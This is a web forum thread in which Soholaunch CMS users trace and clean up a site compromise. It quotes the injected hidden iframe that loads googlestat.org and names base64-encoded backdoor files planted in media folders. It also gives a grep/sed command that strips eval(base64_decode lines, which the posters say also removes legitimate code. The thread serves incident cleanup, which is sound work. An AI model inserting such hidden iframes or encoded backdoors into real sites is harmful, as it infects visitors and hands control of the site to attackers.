34 replies to this topic

[lwyau]

Two of my clients told me that their customers told them that their websites "having trojan horse". Presumably the end users anti virus softwares were alerting them when accessing either site. Both are, of course, solo sites.

The thing is that I cannot see any such alert on my computers (windows xp with McAfee anti virus) and running sohoscan.php did not reveal any problems, either.

Has anyone else encountered this?

[ianc13]

I have found amongst my friends and clients that it all depends on what virus protection program you use, and how often it is updated. I use Norton Corporate on 2 of my pc's and AVG free edition on the others. Both these programs pick up different things, and also false detect Trojans when they are actually cookies with a refresh function on them (ie:shopping cart cookies). I would ask your clients for more information on what was found, and what program found them, possibly it was even a spyware checker program and the problem is a temp directory related one. Of course it is possible that someone has placed a trojan redirect code through the site, but unikley if your scan did not pick it up.

[george]

its the helpmehelpyou.php file that is probably being detected.


its been reported as setting off anti virus programs but i believe it is still being included in the builds...

[DrJon]

I know this thread is pretty old, but one of my clients is having tha same trouble and it's happened twice now.
On every page is this:

<body>
<iframe src="http://googlestat.org/stat/go.php?sid=1" width="0" height="0" frameborder="0"></iframe>
</body>

(The first time it was a different url in the iframe)

I've traced the source of this code to shared_functions.php where it appeared once at the beginning of the regular php code, before the 'proper code' begins, and today it appears after the last ?>

I double checked the .htaccess file against another unhacked site and found distinc difference - ie: it was almost non existent, so uploaded a modified version of that to the hacked site.

Now... my question is: where is this vulnerability occurring? Any ideas peeps?

[dresswell]

Hi Dr jon,
We missed you around here.

I found the same thing on a site today for someone im helping here today.
I have not figured out yet how they got there yet.
dresswell

[busi6292]

I too have got the same problem and Soholaunch don't seem to want to be made aware of the problem unless I pay for support.

Can you let me know where the shared_functions.php file is please so I can temporarily fix the problem. I will have to switch my clients to a new CMS one by one asap with this major problem - it has resulted unfortunately in the sites being blacklisted now on Google.

If anyone knows where the vulnerabilty has occured, I too would like to know please.

Thanks.

[Matt Wilcox]

I can confirm two of my sites had the exact same thing. Look in the shared_functions.php file in sohoadmin/program/includes

Also, look for a photo.php or photos.php file in your media folder, it will be completely encoded.

What versions are you all running? I was running the latest on mine.

Are any of you using any plugins too? I have two different plugins both by the same company on both of my sites. Those were the similarities between the two.

[Matt Wilcox]

One more thing, that Mike Morrison at Soho sent me the other day - http://www.soholaunc...ia/sohoscan.zip

It's very useful.

[dresswell]

I have also seen these in the media folder.
Page.php, 404.php.
Looks like a eval(base64).

Heres how to remove it.
Got this from draknet.

Log in with ssh and run this command:

for file in $(grep "eval(base64_decode(" -lir *); do sed -i 's/eval(base64_decode(.*));//g' $file; done;

It will strip out that line from any file that has it (including ones that should, so be careful using this).

dresswell

[DrJon]

Problem with that one is that there seems to be many lines of code with the base64 encoding code......

I just downloaded the entire site locally and did a 'find in files' command to locate the offending code.

Still unsure of how the exploit works though - although I did find that in the shopping directory the email to friend php file had both the ownership entirely removed as well as having no permissions whatsoever. Tried chmodding it to no avail and had to remove it from server and upload a good version from another Soho site.

Could be just a coincidence.. who knows?

Anyone?

Edit: If they get listed on Google as blacklisted (as my client did) as soon as you clean up the site you can request that they do another scan of the site - you need an account --> webmaster tools...

I'd hang fire on using another CMS until you know how the exploit was carried out: if one piece of software can be hacked, then so might another.....

Edited by DrJon, 11 June 2010 - 04:27 PM.

[dresswell]

I have been using this for a few months now on a bunch of soho sites.
What i do is run the installsoholaunch.php after the ssh command.
Seams to do the trick.
dresswell

[DrJon]

I'm guessing that if you don't have the ability to log in with ssh, or are nervous about running command line instructions, then the sohoscan.php -> delete these files -> installsoholaunch.php should achieve the same result.

[dresswell]

I have not tried it that way but i would think it would work also.
dresswell

[Matt Wilcox]

I just use the sohoscan to do the dirty work for me, I only deleted files I knew weren't supposed to be there. I agree on the grep command, a lot of files use base64 and plugins do too. I wouldn't want someone to just go in and delete everything.

As for the email a friend file... this little bugger has been causing issues since day 1, but I'm pretty sure when I was reading about changes in one of the last revisions, Soho said they had pretty much fixed all the issues with it.

I'm tempted to write a plugin that just eliminates it. I never have it turned on for any of my client's sites and ask them not to use it.

[busi6292]

Interesting to read everyone's replies.

I removed the code fom the shared_functions.php file relating to that iframe. I also removed something called photo.php in the media folder which was base64 encoded..it's quite scary seeing someone elses user name and password in tha file too..does anyone know what all of this did or what was suppose to do to the site? I assume it was an automated script that targeted multiple sites?

Thanks Dr Jon for the info, I will ask for a rescan of the site in Webmaster Tools - wasn't aware you could do that there.

[Mike Morrison]

Hey Everybody,

Two points to mention here...
1. There were some exploits in older builds, but we have corrected them. Make sure you're running the latest version (as of right now v4.9.3 r38+).

2. sohoscan.php is your best friend for investigating hacks...
http://www.soholaunc...ia/sohoscan.zip

Please let us know via support ticket if you've cleaned a site, updated to v4.9.3 r38+ and THEN get hacked again (pointing to an outstanding vulnerability).

[Matt Wilcox]

I deleted my copies of the encoded script, but if someone has one saved, I can run it on my mac while it's not connected to a network and decode it to see if I can follow the code. PM me if you have a copy you want to send.

[kyle04]

Reminds me when I was hacked a while ago - the sohoscan.php script did identify eval(gzinflate(base64_decode( encoded scripts which I removed as no soho script is encoded this way. There were 2 or 3 of this type in a variety of locations (including image folders, shopping folder, template folders). Names to be wary of include :

ini.php
function.php
prod_cust_card.php
thumb.php

They were all remote ftp programmes - not a good thing to have in your site !

AndyP

[DrJon]

Well... it's happened again to the same site - latest version, nothing untoward about the site at all, just a regular site.

The code was again attached to the end of the shared functions file so I've removed it and set the chmod to no write mode - we'll see if this makes a difference.

[draknet]

Have you checked the FTP logs to see if anyone not recognized is getting in?